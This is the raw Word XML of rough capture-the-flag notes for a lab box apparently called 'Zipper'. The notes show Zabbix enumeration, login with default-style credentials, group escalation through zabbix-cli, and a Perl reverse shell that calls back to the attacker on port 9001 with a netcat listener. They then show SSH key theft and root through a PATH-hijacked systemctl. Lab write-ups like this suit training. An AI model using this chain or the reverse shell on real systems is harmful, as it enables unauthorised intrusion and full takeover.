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F4D96EF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DE5859">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Zipper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5954674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E585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E5859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DE585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E5859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DE585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E5859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DE585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E5859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EC98DE6" w:rsidR="00843DCE" w:rsidRDefault="00DE585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and its default </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B38728F" w14:textId="5F0F7941" w:rsidR="00DE5859" w:rsidRDefault="00DE5859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dirsearch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-w 2.3 medium.txt -e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html,php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28317686" w14:textId="4C67F02E" w:rsidR="00DE5859" w:rsidRDefault="00DE585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see Zabbix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B594F3E" w14:textId="32ACACD6" w:rsidR="00DE5859" w:rsidRDefault="00DE585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admin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is not working so sign in as guest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A451A93" w14:textId="7FF36974" w:rsidR="00DE5859" w:rsidRDefault="00DE585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notice the zapper is the use so try to login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zapper:zapper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76E528A6" w14:textId="7C6BBD2B" w:rsidR="00DE5859" w:rsidRDefault="00DE585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get new error message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF8F4A2" w14:textId="77777777" w:rsidR="00A821A5" w:rsidRDefault="00A821A5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5F9D2137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Zabbix = visit zabbix.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A102561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go to Zabbix cli tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4876D161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go to Zabbix cli</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114B5999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docs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manual.rst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12B8F084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go under. we see install some dependency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEFB8B1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clone it and done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D35BF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425392E3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Zabbix-cli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zapper:zapper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help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B36F8A4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show users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ED6DD1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add_user-to_usergroup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zapper = zapper administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9AB447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delete_user_from_usergroup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zapper = no access to frontend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33030154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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1556BEF9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just login with zapper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zapper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3BE90690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search Zabbix documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AD8D50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method reference = script = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E132F73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website click on administrator = scripts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58C2BF42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 scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42303EF0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revershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4FEB4F9C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1159E605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tun0 -p9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DA1932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or copy from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pentest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monkey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0562AB" w14:textId="77777777" w:rsidR="00797456" w:rsidRDefault="00797456" w:rsidP="0079745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perl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-e ‘use Socket:$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>=our_ip-9001; socket(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S,PF_INET.SOCK_STREAM.getprotobyname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(“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”)); if(connect(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S.sockaddr_in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>($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p.inet.aton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>($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>)))).{open(STDIN.”&gt;&amp;S”); open(STDOUT”&gt;&amp;S”);open(STDERR.&gt;&amp;S”);exec(“/bin/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-I”);}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA6E2E3" w14:textId="77777777" w:rsidR="00797456" w:rsidRDefault="00797456" w:rsidP="007974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start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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</w:rPr>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5ACAC0" w14:textId="77777777" w:rsidR="00797456" w:rsidRDefault="00797456" w:rsidP="007974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 to monitoring = click on select with Zabbix server &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6220E8A3" w14:textId="77777777" w:rsidR="00797456" w:rsidRDefault="00797456" w:rsidP="007974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select hosts all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23899A98" w14:textId="77777777" w:rsidR="00797456" w:rsidRDefault="00797456" w:rsidP="007974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now go to zapper = right click = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>revershell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70FC89D7" w14:textId="77777777" w:rsidR="00797456" w:rsidRDefault="00797456" w:rsidP="007974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we got a shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2340E808" w14:textId="77777777" w:rsidR="00797456" w:rsidRDefault="00797456" w:rsidP="00797456">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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70E3290C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home/zapper/utils cat backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AAB485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got the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DC3DFE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zapper and we got the zipper access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C42ED6C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now at .ssh we have the private key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9B3242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cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02E3E8B8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terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C638D0B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mousepad </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>zapper.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1226D3AA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chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 600 it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7692E41E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ssh -I </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>zapper.key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zapper@t_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C46380C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</w:p>
    <w:p w14:paraId="2CE12CF5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utils  = we notice Zabbix-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55866B93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ltrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./it = stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D9C590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notice it print with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D7CF303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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D83A1CB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#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE2AB35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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCEEE83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chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> +x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2CA104C3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export PATH=`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>`:$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38407944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echo $PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C790A09" w14:textId="77777777" w:rsidR="006206B6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./Zabbix-service start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A82B70F" w14:textId="77777777" w:rsidR="006206B6" w:rsidRPr="00356730" w:rsidRDefault="006206B6" w:rsidP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we got the root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1365921C" w:rsidR="00A311DF" w:rsidRPr="00843DCE" w:rsidRDefault="0062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On Desktop of root we obtain the proof.txt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0E53E3"/>
    <w:rsid w:val="00153F7D"/>
    <w:rsid w:val="00356730"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="006206B6"/>
    <w:rsid w:val="00797456"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="0091268F"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A821A5"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00DE5859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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-07T18:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>